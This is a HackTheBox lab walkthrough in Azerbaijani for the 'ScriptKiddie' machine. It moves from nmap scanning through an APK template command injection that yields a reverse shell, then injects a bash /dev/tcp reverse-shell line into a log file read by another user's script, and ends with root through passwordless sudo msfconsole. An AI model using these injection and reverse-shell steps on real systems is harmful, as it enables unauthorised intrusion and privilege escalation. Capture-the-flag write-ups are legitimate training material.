Script Kiddie

Bu gün HacktheBox platformasında daha bir ScriptKiddie adlı maşını götürməyə çalışacayıq. Olduqca asan bir maşındır. Çətinlik səviyyəsi 10/3

İlk öncə nmap ilə scan edək.

sudo nmap -sV -sC -v 10.10.10.226

Gördüyümüz kimi 2 port açıqdır. 22, 5000. Ssh 8.2 versiyasıdır bu versiyada heç bir boşluq yoxdur. 5000 porta baxırıq. Sadə bir səhifədir.

Web applicationun versiyasina baxırıq. Werkzeug httpd 0.16.1. İnternetdə araşdırdıqda görürük ki, Werkzeug Debug Shell Command Execution boşluğu mövcuddur bu versiyada. Explooiti nəzərdən keçirsək görərik ki, bu boşluğun işləəməyi üçün /console direktoriyası açıq olmalıdır. Bizim applicationda isə bu funksiya disable olunub.

Keçirik səhifəni incələməyə funksiyaları ilə maraqlanmağa. Burda nmap payload və sploit var. payload bölməsi üzərində müəyyən testlər keçiririk. Burda bizə sistemə fayl yüklüyüm bu fayla uyğun shell yaratmaq üçün bölmə qoyulub. exe faylından əlavə digər hər hansısa bir faylı yüklədikdə bizə xəta verir. “windows requires a exe ext template file”.

Digər platformalar üçündə yoxluyuruq. “android requires a apk ext template file” tipli xəta alırıq bu dəfədə. Xətanı internetdə araşdırarkən “APK Template Command Injection” tipli boşluq olduğun görürük.

msfconsole köməkliyi apk faylına reverse_shell yükləyib sistemə upload etmək lazımdır.

İndi isə bu apk faylimizi sistemə yüklüyək. Netcat ilə isə 9001 portumuzu listen edək.

Apk nı yükləyib generate etdikdə bizim reverse_shellimiz yaranır. Reverse shelli tty shell ilə əvəzliyirik.

Sistemi enum edərək görürük ki sistemdə 2 user var. pwn userinin yetkiləri bizim userdən daha çoxdu. pwn userinin direktoriyasına daxil olduqda scanlosers.sh adlı script olduğun görürük.

Scripti analiz edərkən görürük ki bu səhifədə işliyən nmap dan gələn sorğuları qəbul edir. Scriptin maraqlı tərəfi ondan ibarətdir ki, script logların /home/kid/hackers faylında saxlıyır.

Biz bu script ancaq read etmək icazəsinə malikiy. amma hackers faylına dəyişiklik edə bilərik.

Bunun üçün hackers faylının içinə payload atmaq lazımdır ki, pwn userinin scripti işə düşdükdə bizim shell bu user adından çalışsın. Shell payload lar haqqında ətraflı cheatsheet githubda var. Maraqlı məqalədi. Bu Linkdən keçid edib oxuya bilərsiz. İndi hackers faylının olduğu direktoriyaya keçid edib orda payloadımızı hacker faylına yüklüyürük. netcat ilədə 9008 listen edirik.

echo “ /bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.93/9008 0>&1’ #”>>hackers

Artıq biz sistemə pwn useri kimi daxil olmuşuq. Linux sisteminə daxil olan kimi ilk işimiz userin hansı icazələrə sahib olduğunu bilməkdi. Bunun üçün sudo -l edirik və görürük ki msfconsolu root adından password olmadan run etmək mümkündür.

sudo msfconsole edirik. whoami etdikdə görürük ki biz root userinə privesc etmişik.